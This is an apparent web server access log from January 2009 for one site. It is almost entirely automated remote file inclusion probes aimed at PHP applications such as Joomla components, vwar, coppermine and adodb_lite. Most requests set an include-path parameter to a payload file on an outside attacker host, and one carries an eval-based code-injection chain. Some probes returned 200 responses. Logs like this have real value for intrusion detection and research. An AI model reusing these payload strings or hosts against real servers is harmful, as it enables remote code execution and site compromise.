79.174.68.56 - - [06/Jan/2009:08:58:47 -0800] "GET /logs/access_080107.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://fuckserv.net/id?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:58:50 -0800] "GET /vwar//includes/functions_install.php?vwar_root=http://oursoultvxq.com/bbs/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:58:54 -0800] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://oursoultvxq.com/bbs/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
208.14.183.136 - - [06/Jan/2009:08:58:59 -0800] "GET /logs//guestbook1//admin.php?include_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.14.183.136 - - [06/Jan/2009:08:58:59 -0800] "GET /logs/access_081101.log//guestbook1//admin.php?include_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.14.183.136 - - [06/Jan/2009:08:58:59 -0800] "GET /guestbook1//admin.php?include_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.35.33.82 - - [06/Jan/2009:08:59:10 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://turkglob.tu.funpic.org/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:59:30 -0800] "GET /logs/access_080226.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:08:59:39 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:08:59:39 -0800] "GET /logs/access_081123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:08:59:43 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 200 95262 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:08:59:53 -0800] "GET /logs/access_081212.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:59:53 -0800] "GET /logs/access_080226.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:59:59 -0800] "GET /logs/access_081114.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.249.18.13 - - [06/Jan/2009:09:00:01 -0800] "GET /logs/access_081102.log/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
89.249.18.13 - - [06/Jan/2009:09:00:01 -0800] "GET /components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
89.249.18.13 - - [06/Jan/2009:09:00:01 -0800] "GET /logs/access_081024.log/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:00:05 -0800] "GET /vwar//includes/functions_install.php?vwar_root=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:09:00:12 -0800] "GET /logs/access_081123.log%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:09:00:18 -0800] "GET /logs/access_080714.log//config/dbutil.bck.php?confdir=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:09:00:18 -0800] "GET /logs/access_080724.log//config/dbutil.bck.php?confdir=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
67.195.37.123 - - [06/Jan/2009:09:00:21 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:09:00:33 -0800] "GET /logs/access_080724.log//config/dbutil.bck.php?confdir=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:09:00:33 -0800] "GET /logs/access_080714.log//config/dbutil.bck.php?confdir=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:09:00:46 -0800] "GET /logs/scripts.log//htbin/shop.pl/page=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:09:00:55 -0800] "GET /logs/access_081123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:09:00:55 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:09:00:55 -0800] "GET /logs/access_081129.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:09:00:56 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 200 95262 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:09:01:01 -0800] "GET /errors.php?error=http://www.northshoredojo.net/images/footer.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:09:01:02 -0800] "GET /logs/errors.php?error=http://www.northshoredojo.net/images/footer.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:09:01:06 -0800] "GET /logs/access_081123.log%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.162.219.29 - - [06/Jan/2009:09:01:30 -0800] "GET /logs/access_080927.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [06/Jan/2009:09:01:30 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [06/Jan/2009:09:01:30 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
8.7.26.27 - - [06/Jan/2009:09:01:31 -0800] "GET /logs/access_080404.log//inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
207.162.219.29 - - [06/Jan/2009:09:01:31 -0800] "GET /logs/access_081015.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.196.124.13 - - [06/Jan/2009:09:01:32 -0800] "GET /components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
91.196.124.13 - - [06/Jan/2009:09:01:32 -0800] "GET /logs/access_081102.log/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
91.196.124.13 - - [06/Jan/2009:09:01:32 -0800] "GET /logs/access_081024.log/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
91.196.124.13 - - [06/Jan/2009:09:01:32 -0800] "GET /logs/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:01:33 -0800] "GET /logs/folder.php?id=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:01:33 -0800] "GET /folder.php?id=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:01:33 -0800] "GET /logs/access_080601.log/folder.php?id=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:01:46 -0800] "GET /logs/access_080601.log/folder.php?id=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:01:46 -0800] "GET /folder.php?id=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:01:46 -0800] "GET /logs/folder.php?id=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:09:01:47 -0800] "GET /logs/access_080927.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:09:01:47 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:09:01:48 -0800] "GET /logs/access_081015.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:09:01:48 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
202.60.67.10 - - [06/Jan/2009:09:01:58 -0800] "GET /logs/access_080504.log//?path[docroot]=http://mhasbi.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.67.10 - - [06/Jan/2009:09:01:59 -0800] "GET /logs//?path[docroot]=http://mhasbi.com/idxx.txt?? HTTP/1.1" 200 81177 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.67.10 - - [06/Jan/2009:09:01:59 -0800] "GET /?path[docroot]=http://mhasbi.com/idxx.txt?? HTTP/1.1" 200 94672 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.67.10 - - [06/Jan/2009:09:02:14 -0800] "GET /logs/access_080503.log//?path[docroot]=http://mhasbi.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [06/Jan/2009:09:02:16 -0800] "GET /errors.php?error=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
77.221.130.2 - - [06/Jan/2009:09:02:16 -0800] "GET /logs/errors.php?error=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.16.234.228 - - [06/Jan/2009:09:02:17 -0800] "GET /logs/access_080927.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.16.234.228 - - [06/Jan/2009:09:02:17 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.16.234.228 - - [06/Jan/2009:09:02:17 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:02:18 -0800] "GET /logs/access_081025.log/folder.php?id=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
62.94.24.125 - - [06/Jan/2009:09:02:23 -0800] "GET /logs/?inc_dir=http://www.tdasemarang.com/p2/js/header? HTTP/1.1" 200 81172 "-" "libwww-perl/5.803" "www.dmulk.com"
62.94.24.125 - - [06/Jan/2009:09:02:25 -0800] "GET /?inc_dir=http://www.tdasemarang.com/p2/js/header? HTTP/1.1" 200 94684 "-" "libwww-perl/5.803" "www.dmulk.com"
86.109.170.176 - - [06/Jan/2009:09:02:29 -0800] "GET /index.php?sayfahttp://turkglob.tu.funpic.org/id1.txt?? HTTP/1.1" 200 94610 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.170.176 - - [06/Jan/2009:09:02:31 -0800] "GET /index.php?sayfahttp://turkglob.tu.funpic.org/id1.txt?? HTTP/1.1" 200 94626 "-" "libwww-perl/5.79" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:09:02:32 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:09:02:32 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:09:02:33 -0800] "GET /logs/access_080927.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:02:34 -0800] "GET /logs/access_081025.log/folder.php?id=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:09:03:02 -0800] "GET /logs/access_081015.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.40.204.130 - - [06/Jan/2009:09:03:11 -0800] "GET /logs/access_080507.log/index.php?pag=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.40.204.130 - - [06/Jan/2009:09:03:11 -0800] "GET /logs/access_080524.log/index.php?pag=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.40.204.130 - - [06/Jan/2009:09:03:11 -0800] "GET /logs/index.php?pag=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.40.204.130 - - [06/Jan/2009:09:03:12 -0800] "GET /index.php?pag=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 200 94922 "-" "libwww-perl/5.812" "www.dmulk.com"
161.58.71.77 - - [06/Jan/2009:09:03:16 -0800] "GET /errors.php?error=http://dowgroup.com//phplive/web/groups/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.58.16.16 - - [06/Jan/2009:09:03:43 -0800] "GET /logs//?path%5Bdocroot%5D=http://fwt.txdnl.com/4-10/r/o/robi22//t.txt??? HTTP/1.0" 200 81150 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
202.58.16.16 - - [06/Jan/2009:09:03:44 -0800] "GET /?path%5Bdocroot%5D=http://fwt.txdnl.com/4-10/r/o/robi22//t.txt??? HTTP/1.0" 200 94847 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
62.149.17.55 - - [06/Jan/2009:09:03:47 -0800] "GET /logs/access_081120.log////?_PHPLIB[libdir]=http://www.vampirewear.com/11.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.17.55 - - [06/Jan/2009:09:03:48 -0800] "GET /logs////?_PHPLIB[libdir]=http://www.vampirewear.com/11.gif??? HTTP/1.1" 200 81179 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:09:04:19 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:09:04:19 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.14.183.136 - - [06/Jan/2009:09:04:37 -0800] "GET /logs/access_081022.log//guestbook1//admin.php?include_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.239.227.49 - - [06/Jan/2009:09:05:16 -0800] "GET /logs//errors.php?error=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.239.227.49 - - [06/Jan/2009:09:05:16 -0800] "GET /errors.php?error=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:09:05:53 -0800] "GET /logs/access_071222.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:09:05:53 -0800] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:09:05:53 -0800] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.231.144.152 - - [06/Jan/2009:09:06:01 -0800] "GET /logs/access_081027.log//?DOCUMENT_ROOT=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:09:06:01 -0800] "GET /logs/access_080311.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.231.144.152 - - [06/Jan/2009:09:06:03 -0800] "GET /?DOCUMENT_ROOT=? HTTP/1.1" 200 94337 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:09:06:03 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:09:06:04 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.231.144.152 - - [06/Jan/2009:09:06:05 -0800] "GET /logs//?DOCUMENT_ROOT=? HTTP/1.1" 200 81177 "-" "libwww-perl/5.803" "www.dmulk.com"
205.231.144.152 - - [06/Jan/2009:09:06:06 -0800] "GET /logs/access_081027.log//?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/copyleft.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.60.67.10 - - [06/Jan/2009:09:06:07 -0800] "GET /logs/access_080228.log//?path[docroot]=http://mhasbi.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
205.231.144.152 - - [06/Jan/2009:09:06:07 -0800] "GET /logs/access_081027.log//?DOCUMENT_ROOT=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:09:06:07 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.231.144.152 - - [06/Jan/2009:09:06:08 -0800] "GET /?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/copyleft.txt?? HTTP/1.1" 200 94847 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:09:06:08 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.231.144.152 - - [06/Jan/2009:09:06:11 -0800] "GET /?DOCUMENT_ROOT=? HTTP/1.1" 200 94385 "-" "libwww-perl/5.803" "www.dmulk.com"
205.231.144.152 - - [06/Jan/2009:09:06:12 -0800] "GET /logs//?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/copyleft.txt?? HTTP/1.1" 200 81177 "-" "libwww-perl/5.803" "www.dmulk.com"
205.231.144.152 - - [06/Jan/2009:09:06:17 -0800] "GET /logs//?DOCUMENT_ROOT=? HTTP/1.1" 200 81177 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.2 - - [06/Jan/2009:09:06:40 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
77.221.130.2 - - [06/Jan/2009:09:06:41 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
205.231.144.152 - - [06/Jan/2009:09:06:48 -0800] "GET /logs//?DOCUMENT_ROOT=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 200 81177 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
205.231.144.152 - - [06/Jan/2009:09:06:48 -0800] "GET /?DOCUMENT_ROOT=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 200 94705 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
72.30.81.169 - - [06/Jan/2009:09:06:49 -0800] "GET /bikes/dteel/140CANON/?N=A HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
119.235.18.7 - - [06/Jan/2009:09:07:08 -0800] "GET /logs/access_081102.log/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
119.235.18.7 - - [06/Jan/2009:09:07:08 -0800] "GET /logs/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
